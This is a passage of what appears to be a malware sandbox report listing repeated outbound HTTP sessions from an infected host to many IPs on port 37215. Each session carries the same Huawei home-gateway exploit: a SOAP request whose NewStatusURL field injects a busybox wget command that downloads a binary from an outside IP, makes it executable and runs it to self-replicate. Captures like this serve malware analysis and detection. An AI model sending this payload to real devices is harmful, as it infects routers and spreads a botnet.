                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2122192.168.2.135546841.2.94.21437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.585143089 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2123192.168.2.13369802.233.167.12637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.585155964 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2124192.168.2.1338590197.63.73.437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.585165024 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2125192.168.2.1345046197.255.20.23137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.585186005 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2126192.168.2.1355610157.92.173.21337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.585191011 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2127192.168.2.1359086149.236.96.6937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.585474014 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2128192.168.2.134479641.52.151.1537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.586497068 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2129192.168.2.134176241.82.189.16437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.586524963 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2130192.168.2.1352190126.56.23.3737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.586896896 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2131192.168.2.1348960101.102.243.10937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.586940050 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
